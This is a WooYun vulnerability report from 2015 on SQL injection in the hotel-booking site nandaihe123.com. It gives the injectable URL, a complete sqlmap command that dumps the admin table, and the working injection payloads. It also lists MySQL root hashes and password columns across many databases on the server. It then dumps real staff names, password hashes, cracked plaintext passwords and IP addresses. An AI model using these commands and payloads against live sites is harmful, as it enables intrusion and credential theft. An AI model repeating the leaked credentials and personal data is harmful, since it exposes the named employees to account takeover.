南戴河123订房网某处存在SQl注入漏洞（DBA权限/root密码泄露/大量用户密码泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152479

漏洞标题：南戴河123订房网某处存在SQl注入漏洞（DBA权限/root密码泄露/大量用户密码泄露）

漏洞作者：路人甲

提交时间：2015-11-08 21:12

修复时间：2015-12-23 21:14

公开时间：2015-12-23 21:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-08：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-12-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

南戴河123订房网（www.nandaihe123.com）是南戴河地区专业旅游订房网站，于2013年正式投入运营，是面向秦皇岛地区旅游相关企业和来南、北戴河的游客的专业旅游商务平台。是服务于广大旅游爱好者和网民的交流窗口。其内容涵盖了吃、住、行、游、购、娱乐等各个方面的信息。为游客提供了详实的目的地指南和旅游产品介绍，充分发挥了互联网的便捷、双向互动的特点。是南戴河、北戴河“阳光、沙滩、大海、长城”自然人文景观的又一个服务平台。
南戴河123订房网（www.nandaihe123.com）拥有一批从事过酒店管理和旅游接待经验的专业人才队伍。本着“诚信、高效、勤勉、共嬴”的经营服务宗旨，为广大游客提供订票、订房、租车、导游等一条龙服务。

详细说明：

地址：http://www.nandaihe123.com/family/family_show.php?id=76

python sqlmap.py -u "http://www.nandaihe123.com/family/family_show.php?id=76" --random-agent -p id --technique=BETU --batch -D nandaihe123 -T admin -C ID,AdminID,UserName,PassWord,IP --dump

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=76 AND 4089=4089
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=76 AND (SELECT 5632 FROM(SELECT COUNT(*),CONCAT(0x71716a6b71,(SELECT (ELT(5632=5632,1))),0x717a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=76 AND (SELECT * FROM (SELECT(SLEEP(5)))rCSJ)
    Type: UNION query
    Title: MySQL UNION query (50) - 56 columns
    Payload: id=-5172 UNION ALL SELECT 50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,CONCAT(0x71716a6b71,0x506f7055417a4a6142497750424b794d6969745a566a684949504c7a6e4c5858776652507a416a74,0x717a706b71),50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50,50#
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user:    'root@%'
current user is DBA:    True
database management system users [2]:
[*] 'root'@'%'
[*] 'zszy168'@'localhost'
database management system users password hashes:
[*] root [1]:
    password hash: *617855EFC73CBED64B39D9746ABE04457A9EAA0E
[*] zszy168 [1]:
    password hash: *7D3E1A2B2E27BE19FCA24C162FC4B28AE7417D53

与密码相关的表：

Database: mijiang
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: mijiang
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: qhdxtd
Table: ecs_users
[3 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| passwd_answer   | varchar(255) |
| passwd_question | varchar(50)  |
| password        | varchar(32)  |
+-----------------+--------------+
Database: qhdxtd
Table: ecs_virtual_card
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| card_password | varchar(60) |
+---------------+-------------+
Database: qhdxtd
Table: ecs_admin_user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: straw-win
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: dongdaihe
Table: ndh_http
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: dongdaihe
Table: ndh_lghy
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: dongdaihe
Table: ndh_membasic
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| m_passwd | varchar(255) |
+----------+--------------+
Database: dongdaihe
Table: ndh_yewu
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: chinassrc
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: user_bs
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: ndh_lghy
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: nandaihe123
Table: user_jtlg
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: ndh_http
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: nandaihe123
Table: user_bgjd
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| PassWord | varchar(100) |
+----------+--------------+
Database: nandaihe123
Table: ndh_membasic
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| m_passwd | varchar(255) |
+----------+--------------+
Database: nandaihe123
Table: ndh_yewu
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: nandaihe123
Table: user_staff
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: nandaihe123
Table: user_dy
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(64) |
+----------+----------+
Database: klsh
Table: sup_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| PassWord | varchar(100) |
+----------+--------------+
Database: klsh
Table: sys_admin
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| PassWord | varchar(100) |
+----------+--------------+
Database: klsh
Table: trade_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| PassWord | varchar(100) |
+----------+--------------+
Database: jobqhd
Table: qs_members
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: jobqhd
Table: qs_gifts
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(160) |
+----------+--------------+
Database: trwpc
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: esc
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: esc
Table: user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| PassWord | varchar(200) |
+----------+--------------+
Database: qhdjd
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: qhdjd
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: qhdqx
Table: user
[1 column]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| userpassword | varchar(100) |
+--------------+--------------+
Database: goucaiw
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: goucaiw
Table: ecs_users
[3 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| passwd_answer   | varchar(255) |
| passwd_question | varchar(50)  |
| password        | varchar(32)  |
+-----------------+--------------+
Database: goucaiw
Table: ecs_virtual_card
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| card_password | varchar(60) |
+---------------+-------------+
Database: goucaiw
Table: ecs_goods
[1 column]
+---------+---------+
| Column  | Type    |
+---------+---------+
| is_pass | int(10) |
+---------+---------+
Database: goucaiw
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: goucaiw
Table: ecs_admin_user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: zszy168
Table: destoon_photo_12
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: zszy168
Table: destoon_member
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| passport | varchar(30) |
| password | varchar(32) |
+----------+-------------+
Database: zszy168
Table: destoon_finance_card
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: zszy168
Table: destoon_group_order
[1 column]
+----------+------------+
| Column   | Type       |
+----------+------------+
| password | varchar(6) |
+----------+------------+
Database: zszy168
Table: destoon_login
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: petly
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: petly
Table: pre_common_member
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: petly
Table: pre_home_album
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: petly
Table: pre_home_blog
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: petly
Table: pre_ucenter_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: wtj
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: axyg
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: axyg
Table: pre_common_member
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: axyg
Table: pre_home_album
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: axyg
Table: pre_home_blog
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: axyg
Table: pre_ucenter_members
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: unxun
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+
Database: unxun
Table: user
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| PassWord | varchar(50) |
+----------+-------------+

选取一处进行测试：

Database: nandaihe123
Table: admin
[7 entries]
+----+---------+----------+-------------------------------------------+---------------+
| ID | AdminID | UserName | PassWord                                  | IP            |
+----+---------+----------+-------------------------------------------+---------------+
| 1  | admin   | 安荣超      | 00c66aaf5f2c3f49946f15c1ad2ea0d3 (123455) | 120.6.139.15  |
| 25 | zr      | 赵锐       | 734056edd0b94138498f5e153c21d6d7          | 120.6.152.84  |
| 32 | lxy     | 李秀艳      | 923008396284aa23c5993cf446e5ffa6 (130305) | 120.6.142.124 |
| 33 | yxq     | 杨晓清      | 4297f44b13955235245b2497399d7a93 (123123) | 120.6.160.146 |
| 53 | cxl     | 陈小丽      | e10adc3949ba59abbe56e057f20f883e (123456) | 120.6.152.84  |
| 54 | zhn     | 张宏娜      | e10adc3949ba59abbe56e057f20f883e (123456) | 120.6.179.35  |
| 58 | lzd     | 刘志丹      | e10adc3949ba59abbe56e057f20f883e (123456) | 120.6.167.35  |
+----+---------+----------+-------------------------------------------+---------------+

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152479

漏洞标题：南戴河123订房网某处存在SQl注入漏洞（DBA权限/root密码泄露/大量用户密码泄露）

相关厂商：南戴河123订房网

漏洞作者：路人甲

提交时间：2015-11-08 21:12

修复时间：2015-12-23 21:14

公开时间：2015-12-23 21:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152479

漏洞标题：南戴河123订房网某处存在SQl注入漏洞（DBA权限/root密码泄露/大量用户密码泄露）

相关厂商：南戴河123订房网

漏洞作者： 路人甲

提交时间：2015-11-08 21:12

修复时间：2015-12-23 21:14

公开时间：2015-12-23 21:14

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0152479"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云